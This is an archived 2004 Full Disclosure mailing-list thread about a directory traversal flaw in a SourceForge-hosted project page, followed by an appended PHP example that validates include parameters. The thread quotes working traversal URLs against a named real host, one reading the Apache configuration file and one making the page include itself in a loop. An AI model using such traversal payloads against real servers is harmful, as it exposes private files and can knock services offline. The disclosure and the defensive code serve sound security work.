Full Disclosure mailing list archives
RE: Vulnerability in sourceforge.net
From: "Andrew Poodle" <andrewp () IRW co uk>
Date: Wed, 21 Jul 2004 15:09:45 +0100
Don't even think about trying this then...

http://btmgr.sourceforge.net/index.php3?body=../../../../../../home/groups/b/bt/btmgr/htdocs/index.php3

Don't want to crash sourceforge by getting it into an infinite loop now do we?

a

-----Original Message-----
From: full-disclosure-admin () lists netsys com
[mailto:full-disclosure-admin () lists netsys com]On Behalf Of nicolas vigier
Sent: 21 July 2004 09:00
To: Alexander
Cc: full-disclosure () lists netsys com
Subject: Re: [Full-disclosure] Vulnerability in sourceforge.net

On Wed, 21 Jul 2004, Alexander wrote:

> Vulnerability in sourceforge.net. Remote user can read any files. Example:

Any file the webserver account can read.

> http://btmgr.sourceforge.net/index.php3?body=../../../../../../usr/local/apache/conf/httpd.conf

This is not a vulnerability in sourceforge, but in one of the project's webpage. And anyone with a project on sourceforge can read the same files using his webspace.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
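
One way to resolve a `body`-style include parameter safely, as an added example that is not part of this thread and not the btmgr project's code. It assumes `index.php3` includes a file named by `body`; `resolve_body()` and the demo directory are hypothetical, and the sample requests are constructed from the two URLs quoted above.

```php
<?php
/**
 * Map a user-supplied "body" value to a file that may be included,
 * or return null when the request must be refused.
 */
function resolve_body(string $body, string $baseDir, string $entryScript): ?string
{
    // Allow only plain page names: no slashes, no "..", no NUL bytes.
    if (!preg_match('/\A[A-Za-z0-9_-]+(\.(php3?|html?))?\z/', $body)) {
        return null;
    }
    // Resolve symlinks on both sides before comparing.
    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . $body);
    if ($base === false || $path === false || !is_file($path)) {
        return null;
    }
    // Containment: the resolved file must live under the base directory.
    if (strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    // Self-inclusion guard: the entry script including itself recurses
    // until the interpreter gives up (the "infinite loop" case).
    if ($path === realpath($entryScript)) {
        return null;
    }
    return $path;
}

// Constructed demo tree (throwaway files in the temp directory).
$root = sys_get_temp_dir() . '/include_demo_' . getmypid();
@mkdir($root, 0700, true);
file_put_contents("$root/index.php3", '<?php /* entry script */');
file_put_contents("$root/news.html", '<p>news</p>');

$requests = [
    'news.html',                                            // legitimate page
    '../../../../../../usr/local/apache/conf/httpd.conf',   // traversal out of the web root
    '../../../../../../home/groups/b/bt/btmgr/htdocs/index.php3', // traversal back to the script
    'index.php3',                                           // self-inclusion without traversal
];
foreach ($requests as $body) {
    $file = resolve_body($body, $root, "$root/index.php3");
    printf("%-62s => %s\n", $body, $file === null ? 'refused' : "include $file");
}
```

Only `news.html` resolves; both traversal strings fail the name check, and the bare `index.php3` is stopped by the self-inclusion guard.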